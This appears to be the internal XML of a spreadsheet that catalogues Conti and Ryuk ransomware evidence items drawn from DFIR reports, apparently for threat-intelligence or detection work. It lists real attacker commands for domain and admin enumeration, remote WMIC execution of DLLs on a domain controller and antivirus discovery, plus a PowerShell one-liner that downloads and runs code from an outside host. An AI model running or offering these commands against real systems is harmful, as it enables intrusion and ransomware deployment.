  </si>
  <si>
    <t>conti-eid0472</t>
  </si>
  <si>
    <t>conti-eid0473</t>
  </si>
  <si>
    <t>conti-eid0474</t>
  </si>
  <si>
    <t>conti-eid0475</t>
  </si>
  <si>
    <t>conti-eid0476</t>
  </si>
  <si>
    <t>conti-eid0477</t>
  </si>
  <si>
    <t>conti-eid0478</t>
  </si>
  <si>
    <t>conti-eid0479</t>
  </si>
  <si>
    <t>conti-eid0480</t>
  </si>
  <si>
    <t>conti-eid0481</t>
  </si>
  <si>
    <t>conti-eid0482</t>
  </si>
  <si>
    <t>conti-eid0483</t>
  </si>
  <si>
    <t>conti-eid0484</t>
  </si>
  <si>
    <t>conti-eid0485</t>
  </si>
  <si>
    <t>conti-eid0486</t>
  </si>
  <si>
    <t>conti-eid0487</t>
  </si>
  <si>
    <t>conti-eid0488</t>
  </si>
  <si>
    <t>conti-eid0489</t>
  </si>
  <si>
    <t>conti-eid0490</t>
  </si>
  <si>
    <t>conti-eid0491</t>
  </si>
  <si>
    <t>conti-eid0492</t>
  </si>
  <si>
    <t>conti-eid0493</t>
  </si>
  <si>
    <t>conti-eid0494</t>
  </si>
  <si>
    <t>conti-eid0495</t>
  </si>
  <si>
    <t>conti-eid0496</t>
  </si>
  <si>
    <t>{"date": "2020-10": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /c echo 92d8cc45954 &gt;; \\.\pipe\446b3c</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C rundll32 C:\Windows\system32\SQL.dll, StartW</t>
  </si>
  <si>
    <t>rundll32 C:\PerfLogs\arti64.dll, rundll</t>
  </si>
  <si>
    <t>nltest /dclist:DOMAIN</t>
  </si>
  <si>
    <t>net group "Domain admins" /DOMAIN</t>
  </si>
  <si>
    <t>net group "enterprise admins" /domain</t>
  </si>
  <si>
    <t>nltest /dclist:"DOMAIN"</t>
  </si>
  <si>
    <t>ping DOMAINCONTROLLER</t>
  </si>
  <si>
    <t>cmd.exe /C time</t>
  </si>
  <si>
    <t>net user administrator /domain</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C WMIC/node:"DC.DOMAIN.local" process call create "cmd /c C:\PerfLogs\servisess.exe\"</t>
  </si>
  <si>
    <t>mmc.exe" "C:\Windows\System32\gpedit.msc"</t>
  </si>
  <si>
    <t>GPL NETBIOS SMB-DS IPC$ share access
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET POLICY SMB2 NT Create AndX Request For an Executable File</t>
  </si>
  <si>
    <t>conti-eid0497</t>
  </si>
  <si>
    <t>conti-eid0498</t>
  </si>
  <si>
    <t>conti-eid0499</t>
  </si>
  <si>
    <t>conti-eid0500</t>
  </si>
  <si>
    <t>conti-eid0501</t>
  </si>
  <si>
    <t>conti-eid0502</t>
  </si>
  <si>
    <t>conti-eid0503</t>
  </si>
  <si>
    <t>conti-eid0504</t>
  </si>
  <si>
    <t>conti-eid0505</t>
  </si>
  <si>
    <t>conti-eid0506</t>
  </si>
  <si>
    <t>conti-eid0507</t>
  </si>
  <si>
    <t>conti-eid0508</t>
  </si>
  <si>
    <t>conti-eid0509</t>
  </si>
  <si>
    <t>conti-eid0510</t>
  </si>
  <si>
    <t>conti-eid0511</t>
  </si>
  <si>
    <t>conti-eid0512</t>
  </si>
  <si>
    <t>conti-eid0513</t>
  </si>
  <si>
    <t>conti-eid0514</t>
  </si>
  <si>
    <t>conti-eid0515</t>
  </si>
  <si>
    <t>conti-eid0516</t>
  </si>
  <si>
    <t>conti-eid0517</t>
  </si>
  <si>
    <t>conti-eid0518</t>
  </si>
  <si>
    <t>conti-eid0519</t>
  </si>
  <si>
    <t>conti-eid0520</t>
  </si>
  <si>
    <t>conti-eid0521</t>
  </si>
  <si>
    <t>conti-eid0522</t>
  </si>
  <si>
    <t>Rubeus</t>
  </si>
  <si>
    <t>{"date": "2020-10": "https://thedfirreport.com/2020/10/08/ryuks-return/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>WMIC /node:"DC.example.domain" process call create "rundll32 C:\PerfLogs\arti64.dll, StartW"</t>
  </si>
  <si>
    <t>ping hostname.domain.local</t>
  </si>
  <si>
    <t>cmd.exe /C reg query HKLM\System\CurrentControlSet\Control\Lsa\Kerbberos\Parameters</t>
  </si>
  <si>
    <t>nltest /dclist:</t>
  </si>
  <si>
    <t>Invoke-CheckLocalAdminAccess</t>
  </si>
  <si>
    <t>Get-NetComputer -operatingsystem *server*</t>
  </si>
  <si>
    <t>Find-LocalAdminAccess</t>
  </si>
  <si>
    <t>WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List</t>
  </si>
  <si>
    <t>Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8</t>
  </si>
  <si>
    <t>WMIC /node:\"DC.example.domain\" process call create \"rundll32 C:\\PerfLogs\\arti64.dll, StartW\"</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe /C dir \\Server\c$</t>
  </si>
  <si>
    <t>ET INFO Observed DNS Query for EmerDNS_TLD (.bazar)
ETPRO POLICY Possibly Suspicious example.com SSL Cert
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
ETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)
Feodo Tracker: potential TrickBot CnC Traffic_detected
ET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB2 NT Create AndX Request For an Executable File In a Temp Directory
ET POLICY RunDll Request Over SMB - Likely Lateral Movement
GPL NETBIOS SMB-DS IPC$ share access
ET CNC Feodo Tracker Reported CnC Server TCP group 15
ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)
ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (MSF style)
ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement</t>
  </si>
  <si>
    <t>conti-eid0523</t>
  </si>
  <si>
    <t>conti-eid0524</t>
  </si>
  <si>
    <t>conti-eid0525</t>
  </si>
  <si>
    <t>conti-eid0526</t>
  </si>
  <si>
    <t>conti-eid0527</t>
  </si>
  <si>
    <t>conti-eid0528</t>
  </si>
  <si>
    <t>conti-eid0529</t>
  </si>
  <si>
    <t>conti-eid0530</t>
  </si>
  <si>
    <t>conti-eid0531</t>
  </si>
  <si>
    <t>conti-eid0532</t>
  </si>
  <si>
    <t>conti-eid0533</t>
  </si>
  <si>
    <t>conti-eid0534</t>
  </si>
  <si>
    <t>conti-eid0535</t>
  </si>
  <si>
    <t>conti-eid0536</t>
  </si>
  <si>
    <t>conti-eid0537</t>
  </si>
  <si>
    <t>conti-eid0538</t>
  </si>
  <si>
    <t>conti-eid0539</t>
  </si>
  <si>
    <t>conti-eid0540</t>
  </si>
  <si>
    <t>conti-eid0541</t>
  </si>
  <si>
    <t>conti-eid0542</t>
  </si>
  <si>
    <t>conti-eid0543</t>
  </si>
  <si>
    <t>conti-eid0544</t>
  </si>
  <si>
    <t>conti-eid0545</t>
  </si>
  <si>
    <t>conti-eid0546</t>
  </si>
  <si>
    <t>conti-eid0547</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of eid</t>
  </si>
  <si>
    <t>cmd /c powershell.exe -nop -hidden -c "IEX ((new-object net.webclient).downloadstring('https://onlineworkercz.com:443/ahwjehefj'))"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</si>
</sst>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vey Wargo" refreshedDate="45765.515891550924" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="547" xr:uid="{D6E14934-8364-2C41-9DA9-6F763D9EBB6D}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems count="547">
        <s v="conti-eid0001"/>
        <s v="conti-eid0002"/>
        <s v="conti-eid0003"/>
        <s v="conti-eid0004"/>
        <s v="conti-eid0005"/>
        <s v="conti-eid0006"/>
        <s v="conti-eid0007"/>
        <s v="conti-eid0008"/>
        <s v="conti-eid0009"/>
        <s v="conti-eid0010"/>
        <s v="conti-eid0011"/>
        <s v="conti-eid0012"/>
        <s v="conti-eid0013"/>
        <s v="conti-eid0014"/>
        <s v="conti-eid0015"/>
        <s v="conti-eid0016"/>
        <s v="conti-eid0017"/>
        <s v="conti-eid0018"/>
        <s v="conti-eid0019"/>
        <s v="conti-eid0020"/>
        <s v="conti-eid0021"/>
        <s v="conti-eid0022"/>
        <s v="conti-eid0023"/>
        <s v="conti-eid0024"/>
        <s v="conti-eid0025"/>
        <s v="conti-eid0026"/>
        <s v="conti-eid0027"/>
        <s v="conti-eid0028"/>
        <s v="conti-eid0029"/>
        <s v="conti-eid0030"/>
        <s v="conti-eid0031"/>
        <s v="conti-eid0032"/>
        <s v="conti-eid0033"/>
        <s v="conti-eid0034"/>
        <s v="conti-eid0035"/>
        <s v="conti-eid0036"/>
        <s v="conti-eid0037"/>
        <s v="conti-eid0038"/>
        <s v="conti-eid0039"/>
        <s v="conti-eid0040"/>
        <s v="conti-eid0041"/>
        <s v="conti-eid0042"/>
        <s v="conti-eid0043"/>
        <s v="conti-eid0044"/>
        <s v="conti-eid0045"/>
        <s v="conti-eid0046"/>
        <s v="conti-eid0047"/>
        <s v="conti-eid0048"/>
        <s v="conti-eid0049"/>
        <s v="conti-eid0050"/>
        <s v="conti-eid0051"/>
        <s v="conti-eid0052"/>
        <s v="conti-eid0053"/>
        <s v="conti-eid0054"/>
        <s v="conti-eid0055"/>
        <s v="conti-eid0056"/>
        <s v="conti-eid0057"/>
        <s v="conti-eid0058"/>
        <s v="conti-eid0059"/>
        <s v="conti-eid0060"/>
        <s v="conti-eid0061"/>
        <s v="conti-eid0062"/>
        <s v="conti-eid0063"/>
        <s v="conti-eid0064"/>
        <s v="conti-eid0065"/>
        <s v="conti-eid0066"/>
        <s v="conti-eid0067"/>
        <s v="conti-eid0068"/>
        <s v="conti-eid0069"/>
        <s v="conti-eid0070"/>
        <s v="conti-eid0071"/>
        <s v="conti-eid0072"/>
        <s v="conti-eid0073"/>
        <s v="conti-eid0074"/>
        <s v="conti-eid0075"/>
        <s v="conti-eid0076"/>
        <s v="conti-eid0077"/>
        <s v="conti-eid0078"/>
        <s v="conti-eid0079"/>
        <s v="conti-eid0080"/>
        <s v="conti-eid0081"/>
        <s v="conti-eid0082"/>
        <s v="conti-eid0083"/>
        <s v="conti-eid0084"/>
        <s v="conti-eid0085"/>
        <s v="conti-eid0086"/>
        <s v="conti-eid0087"/>
        <s v="conti-eid0088"/>
        <s v="conti-eid0089"/>
        <s v="conti-eid0090"/>
        <s v="conti-eid0091"/>
        <s v="conti-eid0092"/>
        <s v="conti-eid0093"/>
        <s v="conti-eid0094"/>
        <s v="conti-eid0095"/>
        <s v="conti-eid0096"/>
        <s v="conti-eid0097"/>
        <s v="conti-eid0098"/>
        <s v="conti-eid0099"/>
        <s v="conti-eid0100"/>
        <s v="conti-eid0101"/>
        <s v="conti-eid0102"/>
        <s v="conti-eid0103"/>
        <s v="conti-eid0104"/>
        <s v="conti-eid0105"/>
        <s v="conti-eid0106"/>
        <s v="conti-eid0107"/>
        <s v="conti-eid0108"/>
        <s v="conti-eid0109"/>
        <s v="conti-eid0110"/>
        <s v="conti-eid0111"/>
        <s v="conti-eid0112"/>
        <s v="conti-eid0113"/>
        <s v="conti-eid0114"/>
        <s v="conti-eid0115"/>
        <s v="conti-eid0116"/>
        <s v="conti-eid0117"/>
        <s v="conti-eid0118"/>
        <s v="conti-eid0119"/>
        <s v="conti-eid0120"/>
        <s v="conti-eid0121"/>
        <s v="conti-eid0122"/>
        <s v="conti-eid0123"/>
        <s v="conti-eid0124"/>
        <s v="conti-eid0125"/>
        <s v="conti-eid0126"/>
        <s v="conti-eid0127"/>
        <s v="conti-eid0128"/>
        <s v="conti-eid0129"/>
        <s v="conti-eid0130"/>
        <s v="conti-eid0131"/>
        <s v="conti-eid0132"/>
        <s v="conti-eid0133"/>
        <s v="conti-eid0134"/>
        <s v="conti-eid0135"/>
        <s v="conti-eid0136"/>
        <s v="conti-eid0137"/>
        <s v="conti-eid0138"/>
        <s v="conti-eid0139"/>
        <s v="conti-eid0140"/>
        <s v="conti-eid0141"/>
        <s v="conti-eid0142"/>
        <s v="conti-eid0143"/>
        <s v="conti-eid0144"/>
        <s v="conti-eid0145"/>
        <s v="conti-eid0146"/>
        <s v="conti-eid0147"/>
        <s v="conti-eid0148"/>
        <s v="conti-eid0149"/>
        <s v="conti-eid0150"/>
        <s v="conti-eid0151"/>
        <s v="conti-eid0152"/>
        <s v="conti-eid0153"/>
        <s v="conti-eid0154"/>
        <s v="conti-eid0155"/>
        <s v="conti-eid0156"/>
        <s v="conti-eid0157"/>
        <s v="conti-eid0158"/>
        <s v="conti-eid0159"/>
        <s v="conti-eid0160"/>
        <s v="conti-eid0161"/>
        <s v="conti-eid0162"/>
        <s v="conti-eid0163"/>
        <s v="conti-eid0164"/>
        <s v="conti-eid0165"/>
        <s v="conti-eid0166"/>
        <s v="conti-eid0167"/>
        <s v="conti-eid0168"/>
        <s v="conti-eid0169"/>
        <s v="conti-eid0170"/>
        <s v="conti-eid0171"/>
        <s v="conti-eid0172"/>
        <s v="conti-eid0173"/>
        <s v="conti-eid0174"/>
        <s v="conti-eid0175"/>
        <s v="conti-eid0176"/>
        <s v="conti-eid0177"/>
        <s v="conti-eid0178"/>
        <s v="conti-eid0179"/>
        <s v="conti-eid0180"/>
        <s v="conti-eid0181"/>
        <s v="conti-eid0182"/>
        <s v="conti-eid0183"/>
        <s v="conti-eid0184"/>
        <s v="conti-eid0185"/>
        <s v="conti-eid0186"/>
        <s v="conti-eid0187"/>
        <s v="conti-eid0188"/>
        <s v="conti-eid0189"/>
        <s v="conti-eid0190"/>
        <s v="conti-eid0191"/>
        <s v="conti-eid0192"/>
        <s v="conti-eid0193"/>
        <s v="conti-eid0194"/>
        <s v="conti-eid0195"/>
        <s v="conti-eid0196"/>
        <s v="conti-eid0197"/>
        <s v="conti-eid0198"/>
        <s v="conti-eid0199"/>
        <s v="conti-eid0200"/>
        <s v="conti-eid0201"/>
        <s v="conti-eid0202"/>
        <s v="conti-eid0203"/>
        <s v="conti-eid0204"/>
        <s v="conti-eid0205"/>
        <s v="conti-eid0206"/>
        <s v="conti-eid0207"/>
        <s v="conti-eid0208"/>
        <s v="conti-eid0209"/>
        <s v="conti-eid0210"/>
        <s v="conti-eid0211"/>
        <s v="conti-eid0212"/>
        <s v="conti-eid0213"/>
        <s v="conti-eid0214"/>
        <s v="conti-eid0215"/>
        <s v="conti-eid0216"/>
        <s v="conti-eid0217"/>
        <s v="conti-eid0218"/>
        <s v="conti-eid0219"/>
        <s v="conti-eid0220"/>
        <s v="conti-eid0221"/>
        <s v="conti-eid0222"/>
        <s v="conti-eid0223"/>
        <s v="conti-eid0224"/>
        <s v="conti-eid0225"/>
        <s v="conti-eid0226"/>
        <s v="conti-eid0227"/>
        <s v="conti-eid0228"/>
        <s v="conti-eid0229"/>
        <s v="conti-eid0230"/>
        <s v="conti-eid0231"/>
        <s v="conti-eid0232"/>
        <s v="conti-eid0233"/>
        <s v="conti-eid0234"/>
        <s v="conti-eid0235"/>
        <s v="conti-eid0236"/>
        <s v="conti-eid0237"/>
        <s v="conti-eid0238"/>
        <s v="conti-eid0239"/>
        <s v="conti-eid0240"/>
        <s v="conti-eid0241"/>
        <s v="conti-eid0242"/>
        <s v="conti-eid0243"/>
        <s v="conti-eid0244"/>
        <s v="conti-eid0245"/>
        <s v="conti-eid0246"/>
        <s v="conti-eid0247"/>
        <s v="conti-eid0248"/>
        <s v="conti-eid0249"/>
        <s v="conti-eid0250"/>
        <s v="conti-eid0251"/>
        <s v="conti-eid0252"/>
        <s v="conti-eid0253"/>
        <s v="conti-eid0254"/>
        <s v="conti-eid0255"/>
        <s v="conti-eid0256"/>
        <s v="conti-eid0257"/>
        <s v="conti-eid0258"/>
        <s v="conti-eid0259"/>
        <s v="conti-eid0260"/>
        <s v="conti-eid0261"/>
        <s v="conti-eid0262"/>
        <s v="conti-eid0263"/>
        <s v="conti-eid0264"/>
        <s v="conti-eid0265"/>
        <s v="conti-eid0266"/>
        <s v="conti-eid0267"/>
        <s v="conti-eid0268"/>
        <s v="conti-eid0269"/>
        <s v="conti-eid0270"/>
        <s v="conti-eid0271"/>
        <s v="conti-eid0272"/>
        <s v="conti-eid0273"/>
        <s v="conti-eid0274"/>
        <s v="conti-eid0275"/>
        <s v="conti-eid0276"/>
        <s v="conti-eid0277"/>
        <s v="conti-eid0278"/>
        <s v="conti-eid0279"/>
        <s v="conti-eid0280"/>
        <s v="conti-eid0281"/>
        <s v="conti-eid0282"/>
        <s v="conti-eid0283"/>
        <s v="conti-eid0284"/>
        <s v="conti-eid0285"/>
        <s v="conti-eid0286"/>
        <s v="conti-eid0287"/>
        <s v="conti-eid0288"/>
        <s v="conti-eid0289"/>
        <s v="conti-eid0290"/>
        <s v="conti-eid0291"/>
        <s v="conti-eid0292"/>
        <s v="conti-eid0293"/>
        <s v="conti-eid0294"/>
        <s v="conti-eid0295"/>
        <s v="conti-eid0296"/>
        <s v="conti-eid0297"/>
        <s v="conti-eid0298"/>
        <s v="conti-eid0299"/>
        <s v="conti-eid0300"/>
        <s v="conti-eid0301"/>
        <s v="conti-eid0302"/>
        <s v="conti-eid0303"/>
        <s v="conti-eid0304"/>
        <s v="conti-eid0305"/>
        <s v="conti-eid0306"/>
        <s v="conti-eid0307"/>
        <s v="conti-eid0308"/>
        <s v="conti-eid0309"/>
        <s v="conti-eid0310"/>
        <s v="conti-eid0311"/>
        <s v="conti-eid0312"/>
        <s v="conti-eid0313"/>
        <s v="conti-eid0314"/>
        <s v="conti-eid0315"/>
        <s v="conti-eid0316"/>
        <s v="conti-eid0317"/>
        <s v="conti-eid0318"/>
        <s v="conti-eid0319"/>
        <s v="conti-eid0320"/>
        <s v="conti-eid0321"/>
        <s v="conti-eid0322"/>
        <s v="conti-eid0323"/>
        <s v="conti-eid0324"/>
        <s v="conti-eid0325"/>
        <s v="conti-eid0326"/>
        <s v="conti-eid0327"/>
        <s v="conti-eid0328"/>
        <s v="conti-eid0329"/>
        <s v="conti-eid0330"/>
        <s v="conti-eid0331"/>
        <s v="conti-eid0332"/>
        <s v="conti-eid0333"/>
        <s v="conti-eid0334"/>
        <s v="conti-eid0335"/>
        <s v="conti-eid0336"/>
        <s v="conti-eid0337"/>
        <s v="conti-eid0338"/>
        <s v="conti-eid0339"/>
        <s v="conti-eid0340"/>
        <s v="conti-eid0341"/>
        <s v="conti-eid0342"/>
        <s v="conti-eid0343"/>
        <s v="conti-eid0344"/>
        <s v="conti-eid0345"/>
        <s v="conti-eid0346"/>
        <s v="conti-eid0347"/>
        <s v="conti-eid0348"/>
        <s v="conti-eid0349"/>
        <s v="conti-eid0350"/>
        <s v="conti-eid0351"/>
        <s v="conti-eid0352"/>
        <s v="conti-eid0353"/>
        <s v="conti-eid0354"/>
        <s v="conti-eid0355"/>
        <s v="conti-eid0356"/>
        <s v="conti-eid0357"/>
        <s v="conti-eid0358"/>
        <s v="conti-eid0359"/>
        <s v="conti-eid0360"/>
        <s v="conti-eid0361"/>
        <s v="conti-eid0362"/>
        <s v="conti-eid0363"/>
        <s v="conti-eid0364"/>
        <s v="conti-eid0365"/>
        <s v="conti-eid0366"/>
        <s v="conti-eid0367"/>
        <s v="conti-eid0368"/>
        <s v="conti-eid0369"/>
        <s v="conti-eid0370"/>
        <s v="conti-eid0371"/>
        <s v="conti-eid0372"/>
        <s v="conti-eid0373"/>
        <s v="conti-eid0374"/>
        <s v="conti-eid0375"/>
        <s v="conti-eid0376"/>
        <s v="conti-eid0377"/>
        <s v="conti-eid0378"/>
        <s v="conti-eid0379"/>
        <s v="conti-eid0380"/>
        <s v="conti-eid0381"/>
        <s v="conti-eid0382"/>
        <s v="conti-eid0383"/>
        <s v="conti-eid0384"/>
        <s v="conti-eid0385"/>
        <s v="conti-eid0386"/>
        <s v="conti-eid0387"/>
        <s v="conti-eid0388"/>
        <s v="conti-eid0389"/>
        <s v="conti-eid0390"/>
        <s v="conti-eid0391"/>
        <s v="conti-eid0392"/>
        <s v="conti-eid0393"/>
        <s v="conti-eid0394"/>
        <s v="conti-eid0395"/>
        <s v="conti-eid0396"/>
        <s v="conti-eid0397"/>
        <s v="conti-eid0398"/>
        <s v="conti-eid0399"/>
        <s v="conti-eid0400"/>
        <s v="conti-eid0401"/>
        <s v="conti-eid0402"/>
        <s v="conti-eid0403"/>
        <s v="conti-eid0404"/>
        <s v="conti-eid0405"/>
        <s v="conti-eid0406"/>
        <s v="conti-eid0407"/>
        <s v="conti-eid0408"/>
        <s v="conti-eid0409"/>
        <s v="conti-eid0410"/>
        <s v="conti-eid0411"/>
        <s v="conti-eid0412"/>
        <s v="conti-eid0413"/>
        <s v="conti-eid0414"/>
        <s v="conti-eid0415"/>
        <s v="conti-eid0416"/>
        <s v="conti-eid0417"/>
        <s v="conti-eid0418"/>
        <s v="conti-eid0419"/>
        <s v="conti-eid0420"/>
        <s v="conti-eid0421"/>
        <s v="conti-eid0422"/>
        <s v="conti-eid0423"/>
        <s v="conti-eid0424"/>
        <s v="conti-eid0425"/>
        <s v="conti-eid0426"/>
        <s v="conti-eid0427"/>
        <s v="conti-eid0428"/>
        <s v="conti-eid0429"/>
        <s v="conti-eid0430"/>
        <s v="conti-eid0431"/>
        <s v="conti-eid0432"/>
        <s v="conti-eid0433"/>
        <s v="conti-eid0434"/>
        <s v="conti-eid0435"/>
        <s v="conti-eid0436"/>
        <s v="conti-eid0437"/>
        <s v="conti-eid0438"/>
        <s v="conti-eid0439"/>
        <s v="conti-eid0440"/>
        <s v="conti-eid0441"/>
        <s v="conti-eid0442"/>
        <s v="conti-eid0443"/>
        <s v="conti-eid0444"/>
        <s v="conti-eid0445"/>
        <s v="conti-eid0446"/>
        <s v="conti-eid0447"/>
        <s v="conti-eid0448"/>
        <s v="conti-eid0449"/>
        <s v="conti-eid0450"/>
        <s v="conti-eid0451"/>
        <s v="conti-eid0452"/>
        <s v="conti-eid0453"/>
        <s v="conti-eid0454"/>
        <s v="conti-eid0455"/>
        <s v="conti-eid0456"/>
        <s v="conti-eid0457"/>
        <s v="conti-eid0458"/>
        <s v="conti-eid0459"/>
        <s v="conti-eid0460"/>
        <s v="conti-eid0461"/>
        <s v="conti-eid0462"/>
        <s v="conti-eid0463"/>
        <s v="conti-eid0464"/>
        <s v="conti-eid0465"/>
        <s v="conti-eid0466"/>
        <s v="conti-eid0467"/>
        <s v="conti-eid0468"/>
        <s v="conti-eid0469"/>
        <s v="conti-eid0470"/>
        <s v="conti-eid0471"/>
        <s v="conti-eid0472"/>
        <s v="conti-eid0473"/>
        <s v="conti-eid0474"/>
        <s v="conti-eid0475"/>
        <s v="conti-eid0476"/>
        <s v="conti-eid0477"/>
        <s v="conti-eid0478"/>
        <s v="conti-eid0479"/>
        <s v="conti-eid0480"/>
        <s v="conti-eid0481"/>
        <s v="conti-eid0482"/>
        <s v="conti-eid0483"/>
        <s v="conti-eid0484"/>
        <s v="conti-eid0485"/>
        <s v="conti-eid0486"/>
        <s v="conti-eid0487"/>
        <s v="conti-eid0488"/>
        <s v="conti-eid0489"/>
        <s v="conti-eid0490"/>
        <s v="conti-eid0491"/>
        <s v="conti-eid0492"/>
        <s v="conti-eid0493"/>
        <s v="conti-eid0494"/>
        <s v="conti-eid0495"/>
        <s v="conti-eid0496"/>
        <s v="conti-eid0497"/>
        <s v="conti-eid0498"/>
        <s v="conti-eid0499"/>
        <s v="conti-eid0500"/>
        <s v="conti-eid0501"/>
        <s v="conti-eid0502"/>
        <s v="conti-eid0503"/>
        <s v="conti-eid0504"/>
        <s v="conti-eid0505"/>
        <s v="conti-eid0506"/>
        <s v="conti-eid0507"/>
        <s v="conti-eid0508"/>
        <s v="conti-eid0509"/>
        <s v="conti-eid0510"/>
        <s v="conti-eid0511"/>
        <s v="conti-eid0512"/>
        <s v="conti-eid0513"/>
        <s v="conti-eid0514"/>
        <s v="conti-eid0515"/>
        <s v="conti-eid0516"/>
        <s v="conti-eid0517"/>
        <s v="conti-eid0518"/>
        <s v="conti-eid0519"/>
        <s v="conti-eid0520"/>
        <s v="conti-eid0521"/>
        <s v="conti-eid0522"/>
        <s v="conti-eid0523"/>
        <s v="conti-eid0524"/>
        <s v="conti-eid0525"/>
        <s v="conti-eid0526"/>
        <s v="conti-eid0527"/>
        <s v="conti-eid0528"/>
        <s v="conti-eid0529"/>
        <s v="conti-eid0530"/>
        <s v="conti-eid0531"/>
        <s v="conti-eid0532"/>
        <s v="conti-eid0533"/>
        <s v="conti-eid0534"/>
        <s v="conti-eid0535"/>
        <s v="conti-eid0536"/>
        <s v="conti-eid0537"/>
        <s v="conti-eid0538"/>
        <s v="conti-eid0539"/>
        <s v="conti-eid0540"/>
        <s v="conti-eid0541"/>
        <s v="conti-eid0542"/>
        <s v="conti-eid0543"/>
        <s v="conti-eid0544"/>
        <s v="conti-eid0545"/>
        <s v="conti-eid0546"/>
        <s v="conti-eid0547"/>
      </sharedItems>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1" count="34">
        <m/>
        <s v="netclt-pid"/>
        <s v="registry-pid"/>
        <s v="pshell-pid"/>
        <s v="netsh-pid"/>
        <s v="wmic-pid, vss-pid"/>
        <s v="wmic-pid, cmd-pid, ntds-pid"/>
        <s v="ntds-pid"/>
        <s v="wmic-pid, cmd-pid,  ntds-pid"/>
        <s v="comsvcs-pid, rundll-pid"/>
        <s v="comsvcs-pid, rundll-pid, wmic-pid"/>
        <s v="lsass-pid"/>
        <s v="mimikatz-pid"/>
        <s v="smbabrute-pid"/>
        <s v="netscan-pid"/>
        <s v="wmic-pid"/>
        <s v="powerview-pid"/>
        <s v="nltest-pid"/>
        <s v="pshell-pid, anydesk-pid, netclt-pid"/>
        <s v="rclone-pid"/>
        <s v="adfind-pid"/>
        <s v="ngrok"/>
        <s v="psexec-pid"/>
        <s v="whoami-pid"/>
        <s v="rubeus-pid"/>
        <s v="procdump-pid"/>
        <s v="comsvcs-pid"/>
        <s v="pnightmare-pid"/>
        <s v="sharpview-pid, powerview-pid"/>
        <s v="ipconfig-pid"/>
        <s v="regsvr-pid"/>
        <s v="powersploit-pid"/>
        <s v="wmic-pid, procdump-pid"/>
        <s v="cmd-pid"/>
      </sharedItems>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="11">
        <s v="{  &quot;date&quot;: &quot;2021&quot;, &quot;url&quot;: &quot;https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;, &quot;url&quot;: &quot;https://talosintelligence.com/resources/269&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;url&quot;: &quot;https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-01&quot;: &quot;https://thedfirreport.com/2021/01/31/bazar-no-ryuk/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
